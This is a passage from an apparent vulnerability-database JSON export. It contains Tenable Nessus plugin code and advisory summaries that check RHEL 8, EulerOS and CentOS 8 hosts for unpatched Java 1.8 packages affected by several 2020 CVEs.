],\n 'enterprise_linux_8_resilientstorage': [\n 'rhel-8-for-s390x-resilientstorage-debug-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-debug-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-source-rpms',\n 'rhel-8-for-s390x-resilientstorage-rpms',\n 'rhel-8-for-s390x-resilientstorage-source-rpms',\n 'rhel-8-for-x86_64-resilientstorage-debug-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-debug-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-source-rpms',\n 'rhel-8-for-x86_64-resilientstorage-rpms',\n 'rhel-8-for-x86_64-resilientstorage-source-rpms'\n ],\n 'enterprise_linux_8_sap': [\n 'rhel-8-for-s390x-sap-netweaver-debug-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-debug-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-source-rpms',\n 'rhel-8-for-s390x-sap-netweaver-rpms',\n 'rhel-8-for-s390x-sap-netweaver-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-source-rpms'\n ],\n 'enterprise_linux_8_sap_hana': [\n 'rhel-8-for-x86_64-sap-solutions-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-rpms',\n 'rhel-8-for-x86_64-sap-solutions-source-rpms'\n ],\n 'enterprise_linux_8_supplementary': [\n 'rhel-8-for-aarch64-supplementary-eus-rpms',\n 'rhel-8-for-aarch64-supplementary-eus-source-rpms',\n 'rhel-8-for-aarch64-supplementary-rpms',\n 'rhel-8-for-aarch64-supplementary-source-rpms',\n 'rhel-8-for-s390x-supplementary-eus-rpms',\n 'rhel-8-for-s390x-supplementary-eus-source-rpms',\n 'rhel-8-for-s390x-supplementary-rpms',\n 'rhel-8-for-s390x-supplementary-source-rpms',\n 'rhel-8-for-x86_64-supplementary-eus-rpms',\n 'rhel-8-for-x86_64-supplementary-eus-source-rpms',\n 'rhel-8-for-x86_64-supplementary-rpms',\n 'rhel-8-for-x86_64-supplementary-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0530');\n}\n\npkgs = [\n {'reference':'java-1.8.0-ibm-1.8.0.6.20-1.el8_3', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-demo-1.8.0.6.20-1.el8_3', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-demo-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-devel-1.8.0.6.20-1.el8_3', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-devel-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-headless-1.8.0.6.20-1.el8_3', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-headless-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-jdbc-1.8.0.6.20-1.el8_3', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-jdbc-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-plugin-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-src-1.8.0.6.20-1.el8_3', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-src-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']},\n {'reference':'java-1.8.0-ibm-webstart-1.8.0.6.20-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'1', 'repo_list':['enterprise_linux_8_appstream', 'enterprise_linux_8_baseos', 'enterprise_linux_8_crb', 'enterprise_linux_8_highavailability', 'enterprise_linux_8_nfv', 'enterprise_linux_8_realtime', 'enterprise_linux_8_resilientstorage', 'enterprise_linux_8_sap', 'enterprise_linux_8_sap_hana', 'enterprise_linux_8_supplementary']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'java-1.8.0-ibm / java-1.8.0-ibm-demo / java-1.8.0-ibm-devel / etc');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-09T17:09:56", "description": "According to the versions of the java-1.8.0-openjdk packages\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JNDI). Supported versions\n that are affected are Java SE: 7u271, 8u261, 11.0.8 and\n 15 Java SE Embedded: 8u261. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14796)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14797)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java\n SE accessible data.(CVE-2020-14803)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14782)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 2, "cvss3": {"score": 4.2, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"}, "published": "2021-02-04T00:00:00", "title": "EulerOS 2.0 SP5 : java-1.8.0-openjdk (EulerOS-SA-2021-1198)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "modified": "2021-02-04T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:java-1.8.0-openjdk", "p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-headless", "p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-devel", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1198.NASL", "href": "https://www.tenable.com/plugins/nessus/146108", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146108);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\n \"CVE-2020-14779\",\n \"CVE-2020-14781\",\n \"CVE-2020-14782\",\n \"CVE-2020-14792\",\n \"CVE-2020-14796\",\n \"CVE-2020-14797\",\n \"CVE-2020-14803\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : java-1.8.0-openjdk (EulerOS-SA-2021-1198)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the java-1.8.0-openjdk packages\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JNDI). Supported versions\n that are affected are Java SE: 7u271, 8u261, 11.0.8 and\n 15 Java SE Embedded: 8u261. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14796)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14797)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java\n SE accessible data.(CVE-2020-14803)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible\n data.(CVE-2020-14782)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1198\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f189fc3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected java-1.8.0-openjdk packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"java-1.8.0-openjdk-1.8.0.191.b12-0.h18.eulerosv2r7\",\n \"java-1.8.0-openjdk-devel-1.8.0.191.b12-0.h18.eulerosv2r7\",\n \"java-1.8.0-openjdk-headless-1.8.0.191.b12-0.h18.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.8.0-openjdk\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-02-04T09:23:12", "description": "The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2020:4347 advisory.\n\n - OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization,\n 8236862) (CVE-2020-14779)\n\n - OpenJDK: Credentials sent over unencrypted LDAP connection (JNDI, 8237990) (CVE-2020-14781)\n\n - OpenJDK: Certificate blacklist bypass via alternate certificate encodings (Libraries, 8237995)\n (CVE-2020-14782)\n\n - OpenJDK: Integer overflow leading to out-of-bounds access (Hotspot, 8241114) (CVE-2020-14792)\n\n - OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680) (CVE-2020-14796)\n\n - OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685)\n (CVE-2020-14797)\n\n - OpenJDK: Race condition in NIO Buffer boundary checks (Libraries, 8244136) (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 4.2, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"}, "published": "2021-02-01T00:00:00", "title": "CentOS 8 : java-1.8.0-openjdk (CESA-2020:4347)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "modified": "2021-02-01T00:00:00", "cpe": ["p-cpe:/a:centos:centos:java-1.8.0-openjdk-javadoc-zip", "p-cpe:/a:centos:centos:java-1.8.0-openjdk-accessibility", "p-cpe:/a:centos:centos:java-1.8.0-openjdk-devel", "p-cpe:/a:centos:centos:java-1.8.0-openjdk-demo", "cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:java-1.8.0-openjdk-headless", "p-cpe:/a:centos:centos:java-1.8.0-openjdk-src", "p-cpe:/a:centos:centos:java-1.8.0-openjdk-javadoc", "cpe:/a:centos:centos:8::appstream", "p-cpe:/a:centos:centos:java-1.8.0-openjdk"], "id": "CENTOS8_RHSA-2020-4347.NASL", "href": "https://www.tenable.com/plugins/nessus/145849", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2020:4347. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145849);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/03\");\n\n script_cve_id(\n \"CVE-2020-14779\",\n \"CVE-2020-14781\",\n \"CVE-2020-14782\",\n \"CVE-2020-14792\",\n \"CVE-2020-14796\",\n \"CVE-2020-14797\",\n \"CVE-2020-14803\"\n );\n script_xref(name:\"RHSA\", value:\"2020:4347\");\n\n script_name(english:\"CentOS 8 : java-1.8.0-openjdk (CESA-2020:4347)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2020:4347 advisory.\n\n - OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization,\n 8236862) (CVE-2020-14779)\n\n - OpenJDK: Credentials sent over unencrypted LDAP connection (JNDI, 8237990) (CVE-2020-14781)\n\n - OpenJDK: Certificate blacklist bypass via alternate certificate encodings (Libraries, 8237995)\n (CVE-2020-14782)\n\n - OpenJDK: Integer overflow leading to out-of-bounds access (Hotspot, 8241114) (CVE-2020-14792)\n\n - OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680) (CVE-2020-14796)\n\n - OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685)\n 